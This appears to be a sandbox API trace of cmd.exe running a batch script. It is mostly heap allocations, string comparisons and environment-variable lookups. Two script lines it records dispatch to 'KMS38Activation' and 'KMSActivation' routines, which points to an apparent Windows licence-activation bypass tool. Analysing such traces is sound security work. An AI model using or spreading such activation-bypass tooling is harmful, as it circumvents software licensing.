0x19a8f1eddd0 [0179.598] GetProcessHeap () returned 0x19a8f1e0000 [0179.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb980 [0179.598] GetProcessHeap () returned 0x19a8f1e0000 [0179.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0179.598] GetProcessHeap () returned 0x19a8f1e0000 [0179.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0179.598] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.598] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.598] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.598] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.598] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.598] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0970 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0ff0 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb60 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0a30 [0179.599] GetProcessHeap () returned 0x19a8f1e0000 [0179.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec900 [0179.600] GetProcessHeap () returned 0x19a8f1e0000 [0179.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0fb0 [0179.600] GetProcessHeap () returned 0x19a8f1e0000 [0179.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0179.600] GetProcessHeap () returned 0x19a8f1e0000 [0179.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0179.600] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0179.600] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0179.600] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0179.600] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0179.600] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0179.600] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0179.600] GetProcessHeap () returned 0x19a8f1e0000 [0179.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0179.601] GetProcessHeap () returned 0x19a8f1e0000 [0179.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1f00c0 [0179.601] GetProcessHeap () returned 0x19a8f1e0000 [0179.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec840 [0179.601] GetProcessHeap () returned 0x19a8f1e0000 [0179.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0179.601] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0179.601] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0179.601] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0179.601] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0179.601] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0179.601] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0179.601] GetProcessHeap () returned 0x19a8f1e0000 [0179.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0179.602] GetProcessHeap () returned 0x19a8f1e0000 [0179.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec740 [0179.602] GetProcessHeap () returned 0x19a8f1e0000 [0179.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec700 [0179.602] GetProcessHeap () returned 0x19a8f1e0000 [0179.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0179.602] GetProcessHeap () returned 0x19a8f1e0000 [0179.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0179.602] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.602] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.602] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.602] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.602] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.602] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.603] GetProcessHeap () returned 0x19a8f1e0000 [0179.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0179.603] GetProcessHeap () returned 0x19a8f1e0000 [0179.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0180 [0179.603] GetProcessHeap () returned 0x19a8f1e0000 [0179.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f8eb0 [0179.603] GetProcessHeap () returned 0x19a8f1e0000 [0179.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0179.603] _wcsicmp (_String1="FOR", _String2="endlocal") returned 1 [0179.603] _wcsicmp (_String1="FOR/?", _String2="endlocal") returned 1 [0179.603] _wcsicmp (_String1="IF", _String2="endlocal") returned 4 [0179.603] _wcsicmp (_String1="IF/?", _String2="endlocal") returned 4 [0179.603] _wcsicmp (_String1="REM", _String2="endlocal") returned 13 [0179.603] _wcsicmp (_String1="REM/?", _String2="endlocal") returned 13 [0179.603] GetProcessHeap () returned 0x19a8f1e0000 [0179.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f060 [0179.604] GetProcessHeap () returned 0x19a8f1e0000 [0179.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1efdf0 [0179.604] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.604] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f62 [0179.604] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb30, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb30*=0x1fff, lpOverlapped=0x0) returned 1 [0179.604] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd8 [0179.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/KMS38\" %nul% && (setlocal & cls & (call :KMS38Activation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/KMS38\" %nul% && (setlocal & cls & (call :KMS38Activation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 118 [0179.605] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.605] GetFileType (hFile=0xa0) returned 0x1 [0179.605] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.605] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd8 [0179.605] GetProcessHeap () returned 0x19a8f1e0000 [0179.605] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.606] GetProcessHeap () returned 0x19a8f1e0000 [0179.606] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.607] GetProcessHeap () returned 0x19a8f1e0000 [0179.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1f0210 [0179.607] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.607] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.607] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.607] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.607] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.607] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.607] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.607] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.607] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.607] GetProcessHeap () returned 0x19a8f1e0000 [0179.607] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0210) returned 1 [0179.607] GetProcessHeap () returned 0x19a8f1e0000 [0179.608] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.608] GetProcessHeap () returned 0x19a8f1e0000 [0179.608] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.609] GetProcessHeap () returned 0x19a8f1e0000 [0179.609] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec820 [0179.609] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.609] GetProcessHeap () returned 0x19a8f1e0000 [0179.609] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec820) returned 1 [0179.609] GetProcessHeap () returned 0x19a8f1e0000 [0179.609] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.610] GetProcessHeap () returned 0x19a8f1e0000 [0179.610] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.610] GetProcessHeap () returned 0x19a8f1e0000 [0179.610] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1efc10 [0179.610] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.610] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.610] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.610] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.610] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.610] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.610] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.610] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.610] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.610] GetProcessHeap () returned 0x19a8f1e0000 [0179.610] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efc10) returned 1 [0179.611] GetProcessHeap () returned 0x19a8f1e0000 [0179.611] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.611] GetProcessHeap () returned 0x19a8f1e0000 [0179.611] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.612] GetProcessHeap () returned 0x19a8f1e0000 [0179.612] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f0210 [0179.612] GetEnvironmentVariableW (in: lpName="_silent", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.612] _wcsicmp (_String1="_silent", _String2="CD") returned -4 [0179.612] _wcsicmp (_String1="_silent", _String2="ERRORLEVEL") returned -6 [0179.612] _wcsicmp (_String1="_silent", _String2="CMDEXTVERSION") returned -4 [0179.612] _wcsicmp (_String1="_silent", _String2="CMDCMDLINE") returned -4 [0179.612] _wcsicmp (_String1="_silent", _String2="DATE") returned -5 [0179.612] _wcsicmp (_String1="_silent", _String2="TIME") returned -21 [0179.612] _wcsicmp (_String1="_silent", _String2="RANDOM") returned -19 [0179.612] _wcsicmp (_String1="_silent", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.612] GetProcessHeap () returned 0x19a8f1e0000 [0179.613] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0210) returned 1 [0179.613] GetProcessHeap () returned 0x19a8f1e0000 [0179.613] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.614] GetProcessHeap () returned 0x19a8f1e0000 [0179.614] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.614] GetProcessHeap () returned 0x19a8f1e0000 [0179.614] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2209e0 [0179.614] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.614] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.614] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.614] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.614] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.614] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220aa0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1efee0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eff70 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21ff60 [0179.615] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.615] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.615] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.615] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.615] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.615] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f1e0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1efbe0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2e) returned 0x19a8f1e0f30 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0c30 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecca0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0ef0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecac0 [0179.615] GetProcessHeap () returned 0x19a8f1e0000 [0179.615] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0cb0 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220b60 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f120 [0179.616] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0179.616] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0179.616] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0179.616] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0179.616] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0179.616] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fc60 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1efeb0 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecc80 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220c20 [0179.616] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0179.616] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0179.616] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0179.616] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0179.616] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0179.616] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220860 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecc00 [0179.616] GetProcessHeap () returned 0x19a8f1e0000 [0179.616] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec7c0 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f2a0 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220320 [0179.617] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0179.617] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0179.617] _wcsicmp (_String1="IF", _String2="call") returned 6 [0179.617] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0179.617] _wcsicmp (_String1="REM", _String2="call") returned 15 [0179.617] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21efa0 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1effd0 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9040 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2203e0 [0179.617] _wcsicmp (_String1="FOR", _String2="endlocal") returned 1 [0179.617] _wcsicmp (_String1="FOR/?", _String2="endlocal") returned 1 [0179.617] _wcsicmp (_String1="IF", _String2="endlocal") returned 4 [0179.617] _wcsicmp (_String1="IF/?", _String2="endlocal") returned 4 [0179.617] _wcsicmp (_String1="REM", _String2="endlocal") returned 13 [0179.617] _wcsicmp (_String1="REM/?", _String2="endlocal") returned 13 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220260 [0179.617] GetProcessHeap () returned 0x19a8f1e0000 [0179.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1efe80 [0179.617] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.618] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd8 [0179.618] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb00, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb00*=0x1fff, lpOverlapped=0x0) returned 1 [0179.618] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8270, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x204e [0179.618] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/KMS-\" %nul% && (setlocal & cls & (call :KMSActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/KMS-\" %nul% && (setlocal & cls & (call :KMSActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 118 [0179.618] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.618] GetFileType (hFile=0xa0) returned 0x1 [0179.618] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.618] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x204e [0179.618] GetProcessHeap () returned 0x19a8f1e0000 [0179.618] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.618] GetProcessHeap () returned 0x19a8f1e0000 [0179.618] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.619] GetProcessHeap () returned 0x19a8f1e0000 [0179.619] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1efdc0 [0179.619] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.619] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.619] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.619] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.619] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.619] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.619] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.619] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.619] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.619] GetProcessHeap () returned 0x19a8f1e0000 [0179.619] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efdc0) returned 1 [0179.619] GetProcessHeap () returned 0x19a8f1e0000 [0179.620] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.620] GetProcessHeap () returned 0x19a8f1e0000 [0179.620] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.621] GetProcessHeap () returned 0x19a8f1e0000 [0179.621] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec760 [0179.621] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.621] GetProcessHeap () returned 0x19a8f1e0000 [0179.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec760) returned 1 [0179.621] GetProcessHeap () returned 0x19a8f1e0000 [0179.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.622] GetProcessHeap () returned 0x19a8f1e0000 [0179.622] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.622] GetProcessHeap () returned 0x19a8f1e0000 [0179.622] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1f02d0 [0179.622] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.622] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.622] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.622] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.622] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.622] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.622] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.623] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.623] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.623] GetProcessHeap () returned 0x19a8f1e0000 [0179.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f02d0) returned 1 [0179.623] GetProcessHeap () returned 0x19a8f1e0000 [0179.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.624] GetProcessHeap () returned 0x19a8f1e0000 [0179.624] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.624] GetProcessHeap () returned 0x19a8f1e0000 [0179.624] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1efc40 [0179.624] GetEnvironmentVariableW (in: lpName="_silent", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.624] _wcsicmp (_String1="_silent", _String2="CD") returned -4 [0179.624] _wcsicmp (_String1="_silent", _String2="ERRORLEVEL") returned -6 [0179.624] _wcsicmp (_String1="_silent", _String2="CMDEXTVERSION") returned -4 [0179.624] _wcsicmp (_String1="_silent", _String2="CMDCMDLINE") returned -4 [0179.624] _wcsicmp (_String1="_silent", _String2="DATE") returned -5 [0179.624] _wcsicmp (_String1="_silent", _String2="TIME") returned -21 [0179.624] _wcsicmp (_String1="_silent", _String2="RANDOM") returned -19 [0179.624] _wcsicmp (_String1="_silent", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.624] GetProcessHeap () returned 